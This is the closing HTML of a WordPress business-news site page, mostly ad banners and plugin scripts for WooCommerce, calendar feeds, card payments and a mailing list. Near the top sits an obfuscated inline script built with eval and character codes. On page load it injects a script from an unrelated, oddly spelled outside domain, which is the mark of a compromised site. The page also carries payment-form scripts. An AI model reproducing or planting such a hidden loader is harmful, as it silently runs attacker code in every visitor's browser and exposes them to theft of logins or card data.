            <img  data-src='https://westfaironline.com/wp-content/uploads/2022/07/120x600-Banner-1.jpg' class='lazyload' src='data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw=='><noscript><img src="https://westfaironline.com/wp-content/uploads/2022/07/120x600-Banner-1.jpg"></noscript></a>
         </div>
             <div class="adsense-120x600-right">
	<a href="https://westfaironline.com/become-a-member" target="_blank">
            <img  data-src='https://westfaironline.com/wp-content/uploads/2022/07/120x600-Banner-3.jpg' class='lazyload' src='data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw=='><noscript><img src="https://westfaironline.com/wp-content/uploads/2022/07/120x600-Banner-3.jpg"></noscript></a>
         </div></div><script type="text/javascript">eval(String.fromCharCode(118,97,114,32,112,115,100,100,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,34,115,99,114,105,112,116,34,41,59,32,118,97,114,32,119,97,110,116,109,101,101,32,61,32,102,97,108,115,101,59,102,111,114,32,40,118,97,114,32,105,32,61,32,48,59,32,105,32,60,32,112,115,100,100,46,108,101,110,103,116,104,59,32,105,43,43,41,32,123,32,32,32,105,102,32,40,112,115,100,100,91,105,93,46,105,100,41,32,123,32,32,32,9,32,105,102,32,40,112,115,100,100,91,105,93,46,105,100,32,61,61,32,34,115,108,101,99,116,114,101,112,111,105,110,116,34,41,123,32,9,9,119,97,110,116,109,101,101,61,116,114,117,101,59,32,9,32,125,32,32,32,125,32,32,125,105,102,40,119,97,110,116,109,101,101,61,61,102,97,108,115,101,41,123,32,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,105,100,61,34,115,108,101,99,116,114,101,112,111,105,110,116,34,59,115,46,115,114,99,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,49,48,44,49,48,49,44,49,49,57,44,49,49,53,44,52,54,44,49,49,57,44,49,48,49,44,57,55,44,49,49,54,44,49,48,52,44,49,48,49,44,49,49,52,44,49,49,50,44,49,48,56,44,49,48,56,44,49,48,56,44,57,55,44,49,49,54,44,49,48,50,44,49,49,49,44,49,49,52,44,49,48,57,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,57,57,44,49,49,49,44,49,49,55,44,49,49,48,44,49,49,54,44,49,48,49,44,49,49,52,44,49,49,53,44,52,54,44,49,48,54,44,49,49,53,44,54,51,44,49,49,56,44,54,49,44,52,57,44,52,57,44,52,54,44,53,48,44,53,49,41,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,32,125));</script>    <!-- Meta Pixel Event Code -->
    <script type='text/javascript'>
        document.addEventListener( 'wpcf7mailsent', function( event ) {
        if( "fb_pxl_code" in event.detail.apiResponse){
          eval(event.detail.apiResponse.fb_pxl_code);
        }
      }, false );
    </script>
    <!-- End Meta Pixel Event Code -->
    <div id='fb-pxl-ajax-code'></div>	<script type="text/javascript">
		(function () {
			var c = document.body.className;
			c = c.replace(/woocommerce-no-js/, 'woocommerce-js');
			document.body.className = c;
		})();
	</script>
	<script type='text/javascript' src='https://westfaironline.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4-wc.7.1.0' id='js-cookie-js'></script>
<script type='text/javascript' id='woocommerce-js-extra'>
/* <![CDATA[ */
var woocommerce_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%"};
/* ]]> */
</script>
<script type='text/javascript' src='https://westfaironline.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=7.1.0' id='woocommerce-js'></script>
<script type='text/javascript' id='wc-cart-fragments-js-extra'>
/* <![CDATA[ */
var wc_cart_fragments_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%","cart_hash_key":"wc_cart_hash_3b3b2ea226132d0f4935516fbf7b8cd8","fragment_name":"wc_fragments_3b3b2ea226132d0f4935516fbf7b8cd8","request_timeout":"5000"};
/* ]]> */
</script>
<script type='text/javascript' src='https://westfaironline.com/wp-includes/js/jquery/ui/core.min.js?ver=1.13.2' id='jquery-ui-core-js'></script>
<script type='text/javascript' src='https://westfaironline.com/wp-includes/js/jquery/ui/mouse.min.js?ver=1.13.2' id='jquery-ui-mouse-js'></script>
<script type='text/javascript' src='https://westfaironline.com/wp-includes/js/jquery/ui/sortable.min.js?ver=1.13.2' id='jquery-ui-sortable-js'></script>
<script type='text/javascript' id='sc-feeds-terms-js-extra'>
/* <![CDATA[ */
var sc_feeds_vars = {"ui":"<div class=\"sc-key-wrapper sc-google\">\n\n\t\t<label class=\"sc-label\" for=\"sc-feed-url-google\">Google Calendar<\/label>\n\n\t\t<span class=\"sc-url-wrapper\">\n\t\t\t<button class=\"sc-copy button-link dashicons dashicons-clipboard\" title=\"Copy\">\n\t\t\t\t<span class=\"screen-reader-text\">Copy<\/span>\n\t\t\t<\/button\n\n\t\t\t><input name=\"sc-feed-url-google\" readonly=\"readonly\" class=\"sc-feed\" value=\"https:\/\/www.google.com\/calendar\/render?cid=webcal%3A%2F%2Fwestfaironline.com%2Fevents%2Fics%2F\"\n\n\t\t\t><a href=\"https:\/\/www.google.com\/calendar\/render?cid=webcal%3A%2F%2Fwestfaironline.com%2Fevents%2Fics%2F\" target=\"_blank\" class=\"sc-visit button-link dashicons dashicons-external\" title=\"Visit\"><span class=\"screen-reader-text\">Visit<\/span><\/a>\n\t\t<\/span>\n\n\t<\/div><div class=\"sc-key-wrapper sc-microsoft\">\n\n\t\t<label class=\"sc-label\" for=\"sc-feed-url-microsoft\">Microsoft Outlook<\/label>\n\n\t\t<span class=\"sc-url-wrapper\">\n\t\t\t<button class=\"sc-copy button-link dashicons dashicons-clipboard\" title=\"Copy\">\n\t\t\t\t<span class=\"screen-reader-text\">Copy<\/span>\n\t\t\t<\/button\n\n\t\t\t><input name=\"sc-feed-url-microsoft\" readonly=\"readonly\" class=\"sc-feed\" value=\"webcal:\/\/westfaironline.com\/events\/ics\/\"\n\n\t\t\t><a href=\"webcal:\/\/westfaironline.com\/events\/ics\/\" target=\"_blank\" class=\"sc-visit button-link dashicons dashicons-external\" title=\"Visit\"><span class=\"screen-reader-text\">Visit<\/span><\/a>\n\t\t<\/span>\n\n\t<\/div><div class=\"sc-key-wrapper sc-apple\">\n\n\t\t<label class=\"sc-label\" for=\"sc-feed-url-apple\">Apple Calendar<\/label>\n\n\t\t<span class=\"sc-url-wrapper\">\n\t\t\t<button class=\"sc-copy button-link dashicons dashicons-clipboard\" title=\"Copy\">\n\t\t\t\t<span class=\"screen-reader-text\">Copy<\/span>\n\t\t\t<\/button\n\n\t\t\t><input name=\"sc-feed-url-apple\" readonly=\"readonly\" class=\"sc-feed\" value=\"webcal:\/\/westfaironline.com\/events\/ics\/\"\n\n\t\t\t><a href=\"webcal:\/\/westfaironline.com\/events\/ics\/\" target=\"_blank\" class=\"sc-visit button-link dashicons dashicons-external\" title=\"Visit\"><span class=\"screen-reader-text\">Visit<\/span><\/a>\n\t\t<\/span>\n\n\t<\/div><div class=\"sc-key-wrapper sc-webcal\">\n\n\t\t<label class=\"sc-label\" for=\"sc-feed-url-webcal\">WebCal<\/label>\n\n\t\t<span class=\"sc-url-wrapper\">\n\t\t\t<button class=\"sc-copy button-link dashicons dashicons-clipboard\" title=\"Copy\">\n\t\t\t\t<span class=\"screen-reader-text\">Copy<\/span>\n\t\t\t<\/button\n\n\t\t\t><input name=\"sc-feed-url-webcal\" readonly=\"readonly\" class=\"sc-feed\" value=\"webcal:\/\/westfaironline.com\/events\/ics\/\"\n\n\t\t\t><a href=\"webcal:\/\/westfaironline.com\/events\/ics\/\" target=\"_blank\" class=\"sc-visit button-link dashicons dashicons-external\" title=\"Visit\"><span class=\"screen-reader-text\">Visit<\/span><\/a>\n\t\t<\/span>\n\n\t<\/div><div class=\"sc-key-wrapper sc-download\">\n\n\t\t<label class=\"sc-label\" for=\"sc-feed-url-download\">Download<\/label>\n\n\t\t<span class=\"sc-url-wrapper\">\n\t\t\t<button class=\"sc-copy button-link dashicons dashicons-clipboard\" title=\"Copy\">\n\t\t\t\t<span class=\"screen-reader-text\">Copy<\/span>\n\t\t\t<\/button\n\n\t\t\t><input name=\"sc-feed-url-download\" readonly=\"readonly\" class=\"sc-feed\" value=\"https:\/\/westfaironline.com\/events\/ics\/?download=1\"\n\n\t\t\t><a href=\"https:\/\/westfaironline.com\/events\/ics\/?download=1\" target=\"_blank\" class=\"sc-visit button-link dashicons dashicons-external\" title=\"Visit\"><span class=\"screen-reader-text\">Visit<\/span><\/a>\n\t\t<\/span>\n\n\t<\/div><div class=\"sc-key-wrapper sc-direct\">\n\n\t\t<label class=\"sc-label\" for=\"sc-feed-url-direct\">Direct<\/label>\n\n\t\t<span class=\"sc-url-wrapper\">\n\t\t\t<button class=\"sc-copy button-link dashicons dashicons-clipboard\" title=\"Copy\">\n\t\t\t\t<span class=\"screen-reader-text\">Copy<\/span>\n\t\t\t<\/button\n\n\t\t\t><input name=\"sc-feed-url-direct\" readonly=\"readonly\" class=\"sc-feed\" value=\"https:\/\/westfaironline.com\/events\/ics\/\"\n\n\t\t\t><a href=\"https:\/\/westfaironline.com\/events\/ics\/\" target=\"_blank\" class=\"sc-visit button-link dashicons dashicons-external\" title=\"Visit\"><span class=\"screen-reader-text\">Visit<\/span><\/a>\n\t\t<\/span>\n\n\t<\/div>"};
/* ]]> */
</script>
<script type='text/javascript' src='https://westfaironline.com/wp-content/plugins/sc-calendar-feeds/sc-calendar-feeds/includes/common/assets/js/term-ical.js?ver=1.3.1' id='sc-feeds-terms-js'></script>
<script type='text/javascript' src='https://westfaironline.com/wp-content/plugins/sc-calendar-feeds/sc-calendar-feeds/includes/common/assets/js/modal.js?ver=1.3.1' id='sc-feeds-modal-js'></script>
<script type='text/javascript' src='https://westfaironline.com/wp-content/plugins/td-composer/legacy/Newsmag/js/tagdiv_theme.min.js?ver=5.2.1' id='td-site-min-js'></script>
<script type='text/javascript' src='https://westfaironline.com/wp-includes/js/comment-reply.min.js?ver=6.1' id='comment-reply-js'></script>
<script type='text/javascript' src='https://westfaironline.com/wp-content/plugins/woocommerce/assets/js/jquery-payment/jquery.payment.min.js?ver=3.0.0-wc.7.1.0' id='jquery-payment-js'></script>
<script type='text/javascript' id='sv-wc-payment-gateway-payment-form-v5_10_12-js-extra'>
/* <![CDATA[ */
var sv_wc_payment_gateway_payment_form_params = {"card_number_missing":"Card number is missing","card_number_invalid":"Card number is invalid","card_number_digits_invalid":"Card number is invalid (only digits allowed)","card_number_length_invalid":"Card number is invalid (wrong length)","cvv_missing":"Card security code is missing","cvv_digits_invalid":"Card security code is invalid (only digits are allowed)","cvv_length_invalid":"Card security code is invalid (must be 3 or 4 digits)","card_exp_date_invalid":"Card expiration date is invalid","check_number_digits_invalid":"Check Number is invalid (only digits are allowed)","check_number_missing":"Check Number is missing","drivers_license_state_missing":"Drivers license state is missing","drivers_license_number_missing":"Drivers license number is missing","drivers_license_number_invalid":"Drivers license number is invalid","account_number_missing":"Account Number is missing","account_number_invalid":"Account Number is invalid (only digits are allowed)","account_number_length_invalid":"Account number is invalid (must be between 5 and 17 digits)","routing_number_missing":"Routing Number is missing","routing_number_digits_invalid":"Routing Number is invalid (only digits are allowed)","routing_number_length_invalid":"Routing number is invalid (must be 9 digits)"};
/* ]]> */
</script>
<script type='text/javascript' src='https://westfaironline.com/wp-content/plugins/woocommerce-gateway-authorize-net-cim/vendor/skyverge/wc-plugin-framework/woocommerce/payment-gateway/assets/dist/frontend/sv-wc-payment-gateway-payment-form.js?ver=5.10.12' id='sv-wc-payment-gateway-payment-form-v5_10_12-js'></script>
<script type='text/javascript' src='https://westfaironline.com/wp-content/plugins/woocommerce-gateway-authorize-net-cim/assets/js/frontend/wc-authorize-net-cim.min.js?ver=3.7.4' id='wc-authorize-net-cim-js'></script>
<script type='text/javascript' id='mailchimp-top-bar-js-extra'>
/* <![CDATA[ */
var mctb = {"cookieLength":"365","icons":{"hide":"&#x25BC;","show":"&#x25B2;"},"position":"bottom","state":{"submitted":false,"success":false}};
/* ]]> */
</script>
<script type='text/javascript' src='https://westfaironline.com/wp-content/plugins/mailchimp-top-bar/assets/js/script.js?ver=1.5.5' id='mailchimp-top-bar-js'></script>
<script type='text/javascript' src='https://westfaironline.com/wp-content/plugins/wp-smush-pro/app/assets/js/smush-lazy-load.min.js?ver=3.12.3' id='smush-lazy-load-js'></script>
<script defer type='text/javascript' src='https://westfaironline.com/wp-content/plugins/akismet/_inc/akismet-frontend.js?ver=1664405351' id='akismet-frontend-js'></script>

<!-- JS generated by theme -->

<script>
    
</script>


</body>
</html>